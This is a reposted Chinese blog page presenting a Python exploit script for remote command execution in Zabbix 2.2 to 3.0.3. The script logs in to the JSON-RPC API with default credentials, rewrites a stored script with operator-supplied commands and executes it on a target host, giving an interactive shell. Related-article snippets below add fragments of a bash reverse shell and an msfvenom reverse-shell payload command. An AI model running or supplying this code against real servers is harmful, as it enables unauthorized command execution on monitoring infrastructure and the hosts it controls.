Zabbix RCE with API JSON-RPC

最新推荐文章于 2022-08-26 21:09:55 发布
最新推荐文章于 2022-08-26 21:09:55 发布
阅读量205 收藏
点赞数
文章标签: json 运维 php
原文链接:http://www.cnblogs.com/persuit/p/5718048.html
版权

测试脚本:

 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3


import requests
import json
import sys


def verify(url,hostid):
    url = url + '/api_jsonrpc.php'    ### Don't edit

    login = 'Admin'        ### Zabbix login
    password = 'zabbix'    ### Zabbix password

    ### auth
    payload = {
           "jsonrpc" : "2.0",
        "method" : "user.login",
        "params": {
            'user': ""+login+"",
            'password': ""+password+"",
        },
           "auth" : None,
        "id" : 0,
    }
    headers = {
        'content-type': 'application/json',
    }

    auth  = requests.post(url, data=json.dumps(payload), headers=(headers))
    auth = auth.json()

    while True:
        cmd = raw_input(':~  ')
        if cmd == "" : print "Result of last command:"
        if cmd == "quit" : break

    ### update
        payload = {
            "jsonrpc": "2.0",
            "method": "script.update",
            "params": {
                "scriptid": "1",
                "command": ""+cmd+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))

    ### execute
        payload = {
            "jsonrpc": "2.0",
            "method": "script.execute",
            "params": {
                "scriptid": "1",
                "hostid": ""+hostid+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
        cmd_exe = cmd_exe.json()
        print cmd_exe["result"]["value"]


if __name__ == '__main__':
    url = sys.argv[1]
    hostid = sys.argv[2]
    verify(url,hostid)

测试截图:

转载于:https://www.cnblogs.com/persuit/p/5718048.html

weixin_33754913
关注
Zabbix JSON-RPC
781193278专栏
12-01 4443
1 Zabbix概述 1) 是一个企业级的分布式开源监控方案 2) 是一个高度集成的网络监控解决方案 3) 是一款能够监控各种网络参数以及服务器健康性和完整性的软件 2 常用名词解释 1) 主机(host):一台你想监控的网络设备,用IP或域名表示 2) 监控项(item):你想要接收的主机的特定数据,一个度量数据 3) Zabbix Server:实现监控的核心
Zabbix 2.2 < 3.0.3 - RCE with API JSON-RPC
weixin_34380781的博客
08-18 371
漏洞来源:https://www.exploit-db.com/exploits/39937/***成本:高危害程度:低(此洞需要密码)利用条件: 需要高权限用户登录影响范围:2.2 < 3.0.3tips: 此洞需要你拿到高权限的账户密码,当你拿到账户密码之后,进入后台也可以执行命令,利用API JSON-RPC为第二种方案。 此exp并不是很完美,因为不会自动...
zabbix后台RCE
weixin_44508748的博客
11-24 1371
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
Zabbix SQL Injection/RCE – CVE-2013-5743
weixin_33743880的博客
03-08 242
瞌睡龙 · 2013/10/17 12:55from:www.corelan.be/index.php/2…0x00 背景该漏洞于2013年9月11号提交,9月23号得到确认,10月2号发布补丁。新出的0day,可以通过sql注入直接进入后台,并执行系统命令。该漏洞已有metasploit利用模块,请使用Zabbix的公司注意及时打补丁。0x01 利用细节该漏洞存在于httpmon.php脚本中,...
zabbix-web-mysql-scl-5.0.8-5.el7.noarch.rpm
12-04
官方离线安装包,亲测可用
zabbix_agent-6.0.3-windows-i386-openssl
05-05
Zabbix Agent 6.0.3 for Windows-i386-OpenSSL:全面解析与应用》 Zabbix Agent是Zabbix监控系统的核心组件之一,主要用于收集被监控服务器或设备的各项性能数据,如CPU利用率、内存使用情况、磁盘空间等,并将...
zabbix-release-6.0-1.el7.noarch.rpm
04-08
zabbix-release-6.0-1.el7.noarch.rpm
zabbix-release-5.0-1.el7.noarch.rpm
07-10
Zabbix5.0LTS rpm安装包 rpm -Uvh zabbix-release-5.0-1.el7.noarch.rpm yum install zabbix-server-mysql zabbix-agent
php-proxy3 漏洞,Zabbix Server Active Proxy Trappe RCE 漏洞详解(CVE-2017-2824)
weixin_39663970的博客
04-12 539
前言有点相似Zabbix是一种企业监控解决方案,旨在使组织能够监控其网络中各种系统的健康状况和状态,包括:网络服务,服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行,影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻,首先需要能访问到Zabbix Serv...
Zabbix SAML SSO认证绕过漏洞(CVE-2022-23131)
Blue的博客
03-06 4861
漏洞描述 Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。 影响范围 5.4.0 - 5.4.8 6.0.0alpha1 漏洞复现 1.首先访问Zabbix首页,提取Cookie并进行base64解码: 2.构造poc我们加入username_attribute,将其赋值为Admin(Zabbix内置的管理员名称),并将其base64编码
zabbix最新漏洞,可绕过认证登陆!
笨办法学linux的博客
08-26 1714
Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的CPU负载和网络流量等指标。式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。...
了解Zabbix API
zsx0728的博客
08-12 1727
文章目录介绍关于APIPyZabbixZabbix gnomes带curl的API其他特征 了解如何利用Zabbix API、自动化日常流程以及与其他解决方案集成。 介绍 在这篇文章中,我将通过示例向您概述Zabbix API的使用与优点。您将了解如何利用Zabbix APIZabbix执行集成和优化。 以下是一些您会用到的资源: Zabbix wiki(关于API库); Zabbix文档; Python Zabbix APIZabbix gnomes(已准备好的脚本)。 关于API API是一个
zabbix漏洞利用 Zabbix Server远程代码执行漏洞CVE-2017-2824 2.4.X均受影响
weixin_33849215的博客
09-01 1353
近日,Zabbix Server 2.4.X的trapper命令功能中被曝出存在可利用的代码执行漏洞(CVE-2017-2824)。 一组特制的数据包可能导致命令注入,导致远程执行代码。 攻击者可以从活动的Zabbix Proxy发出请求以触发此漏洞。该漏洞位于Zabbix代码的“Trapper”部分,这是允许代理和服务器通信的网络服务(TCP端口100...
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 927
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
Zabbix 远程代码执行漏洞(CVE-2020-11800)复现
玄道的网安博客
01-14 5204
简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 漏洞概述 Zabbix Server的trapper命令处理,存在命令注入漏洞,可导致远程代码执行。 影响版本 Zabbix 3.0.x~3.0.30 环境搭建 项目地址 https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2020-11800 ...
Zabbix 远程代码执行漏洞复现(CVE-2020-11800)
m0_48520508的博客
03-08 5484
0x00简介 abbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,A
CVE-2020-1938(RCE利用)
热门推荐
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
Zabbix 3.0.10 Web应用架构详解:PHP MVC与JSON-RPC 2.0 API
此外,Zabbix还提供了一套遵循JSON-RPC 2.0协议的Web API,这使得Zabbix能够与其他系统进行通信,扩展功能或自动化任务。然而,由于应用结构复杂,本文重点介绍了MVC架构和API的基本框架,以帮助理解其内部工作原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值